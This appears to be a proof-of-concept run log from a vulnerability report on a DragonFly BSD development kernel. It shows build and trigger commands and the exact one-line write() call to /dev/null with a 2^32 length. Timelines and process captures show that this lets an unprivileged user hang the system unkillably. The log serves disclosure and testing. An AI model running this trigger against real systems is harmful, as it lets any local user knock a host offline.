DF-0079 / run.log
================================================================================
DF-0079 — decisive runtime demonstration (host-side timeline + serial proof)
Guest: DragonFly 6.5-DEVELOPMENT x86_64, 2 CPUs, maxx uid 1001 (not in wheel)
================================================================================
[1] Build (as maxx):
$ cd poc/DF-0079 && cc -o df0079 df0079.c
BUILD_EXIT=0
-rwxr-xr-x 1 maxx maxx 9104 ... df0079
[2] Trigger (as UNPRIVILEGED maxx; /dev/null is mode 0666):
maxx$ cd poc/DF-0079 && nohup ./df0079 > w.out 2>&1 < /dev/null &
WEDGE_PID=889
# ./df0079 does: fd=open("/dev/null",O_WRONLY); write(fd,(void*)0x1,0x100000000ULL);
# ^^^ iov_len = 2^32, low 32 bits == 0 -> u_int c truncates to 0
# -> mmrw bookkeeping subtracts 0 -> while(uio_resid>0) spins forever
[3] Host-side ssh reachability timeline after trigger (probes every 1s):
t= 1s ssh=UNREACHABLE
t= 2s ssh=UNREACHABLE
t= 3s ssh=UNREACHABLE
t= 4s ssh=UNREACHABLE
t= 6s ssh=UNREACHABLE
t= 8s ssh=UNREACHABLE
t=10s ssh=UNREACHABLE
=> A SINGLE unprivileged write() rendered the guest unresponsive to ssh
within 1 second. No panic (clean starvation). Only `vm.sh reset` recovers.
================================================================================
EARLIER DECISIVE RUN (richer capture; wedge landed on the non-network CPU so a
serial-console watcher survived long enough to snapshot the wedged thread).
Full per-iteration ps/top in serial_wedge_capture.txt. Key excerpt:
================================================================================
PID PPID STAT UID %CPU TIME UCOMM COMMAND
852 1 R0 1001 0.0 0:00.50 df0079 ./df0079 (t+0.0s)
852 1 R0 1001 0.0 0:01.68 df0079 ./df0079 (t+0.7s)
852 1 R0 1001 0.0 0:02.86 df0079 ./df0079 (t+1.4s)
...
852 1 R0 1001 0.0 0:20.56 df0079 ./df0079 (t+19.5s)
CPU states: 0.0% user, 0.0% nice, 50.0% system, 0.0% interrupt, 50.0% idle
(2-CPU guest: one core fully in kernel `sys` = the wedged mmrw loop.)
INTERPRETATION:
- STAT R0 : thread Running on CPU (not blocked/sleeping) -> spinning.
- UID 1001 : triggered by UNPRIVILEGED user maxx.
- TIME grows ~1.18s per ~1.0s wall -> 100% of one CPU, indefinitely.
- residual never drains (c=0 truncation) -> the write() NEVER returns.
- process is unkillable (no signal-check point in the tight kernel loop);
only a hard reset recovers the guest.
VERDICT: REPRODUCED. Trivial unprivileged full-system/local DoS.